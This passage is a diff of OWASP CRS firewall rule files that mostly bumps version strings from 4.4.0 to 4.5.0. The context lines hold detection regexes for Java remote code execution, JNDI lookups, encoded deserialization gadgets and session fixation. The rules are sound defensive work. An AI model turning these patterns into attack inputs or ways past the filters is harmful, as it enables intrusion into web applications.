@@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)" \ "id:943100,\ phase:2,\ @@ -24,7 +24,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -43,7 +43,7 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.943110_matched_var_name=%{matched_var_name}',\ chain" 
@@ -68,17 +68,17 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.943120_matched_var_name=%{matched_var_name}',\ chain" SecRule &REQUEST_HEADERS:Referer "@eq 0" \ "setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" 
"id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" SecMarker "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" diff --git a/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf index 5d34c36..8711843 100644 --- a/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf +++ b/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # 
@@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ "@rx java\.lang\.(?:runtime|processbuilder)" \ "id:944100,\ @@ -25,7 +25,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -45,7 +45,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:unmarshaller|base64data|java\.)" \ 
@@ -67,7 +67,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \ @@ -89,7 +89,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -108,7 +108,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -127,12 +127,12 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)(?:[^\}]*(?:\$|$?)(?:\{|&l(?:brace|cub);?)|jndi|ctx)" \ "id:944151,\ phase:2,\ @@ -148,7 +148,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -167,7 +167,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -186,7 +186,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -206,7 +206,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -226,7 +226,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -246,12 +246,12 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ "@rx (?:cnVudGltZQ|HJ1bnRpbWU|BydW50aW1l|cHJvY2Vzc2J1aWxkZXI|HByb2Nlc3NidWlsZGVy|Bwcm9jZXNzYnVpbGRlcg|Y2xvbmV0cmFuc2Zvcm1lcg|GNsb25ldHJhbnNmb3JtZXI|BjbG9uZXRyYW5zZm9ybWVy|Zm9yY2xvc3VyZQ|GZvcmNsb3N1cmU|Bmb3JjbG9zdXJl|aW5zdGFudGlhdGVmYWN0b3J5|Gluc3RhbnRpYXRlZmFjdG9yeQ|BpbnN0YW50aWF0ZWZhY3Rvcnk|aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg|Gluc3RhbnRpYXRldHJhbnNmb3JtZXI|BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy|aW52b2tlcnRyYW5zZm9ybWVy|Gludm9rZXJ0cmFuc2Zvcm1lcg|BpbnZva2VydHJhbnNmb3JtZXI|cHJvdG90eXBlY2xvbmVmYWN0b3J5|HByb3RvdHlwZWNsb25lZmFjdG9yeQ|Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk|cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk|HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5|Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ|d2hpbGVjbG9zdXJl|HdoaWxlY2xvc3VyZQ|B3aGlsZWNsb3N1cmU)" \ "id:944300,\ 
@@ -268,12 +268,12 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'OWASP_CRS',\ tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)" \ "id:944152,\ phase:2,\ @@ -289,7 +289,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE tag:'OWASP_CRS',\ tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf index 4881918..74758f5 100644 --- a/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf +++ b/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf 
@@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -14,7 +14,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ "id:949152,\ @@ -23,7 +23,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ "id:949053,\ @@ -32,7 +32,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ "id:949153,\ @@ -41,7 +41,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ "id:949054,\ @@ -50,7 +50,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ "id:949154,\ @@ -59,7 +59,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ "id:949055,\ 
@@ -68,7 +68,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ "id:949155,\ @@ -77,7 +77,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecAction \ "id:949059,\ @@ -86,7 +86,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=0'" SecAction \ "id:949159,\ @@ -95,7 +95,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=0'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ "id:949060,\ @@ -104,7 +104,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ "id:949160,\ @@ -113,7 +113,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ "id:949061,\ @@ -122,7 +122,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ "id:949161,\ 
@@ -131,7 +131,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ "id:949062,\ @@ -140,7 +140,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ "id:949162,\ @@ -149,7 +149,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ "id:949063,\ @@ -158,7 +158,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ "id:949163,\ @@ -167,7 +167,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecMarker "BEGIN-REQUEST-BLOCKING-EVAL" SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ @@ -178,7 +178,7 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh msg:'Inbound Anomaly Score Exceeded in phase 1 (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ chain" SecRule TX:EARLY_BLOCKING "@eq 1" SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ 
@@ -189,13 +189,13 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" 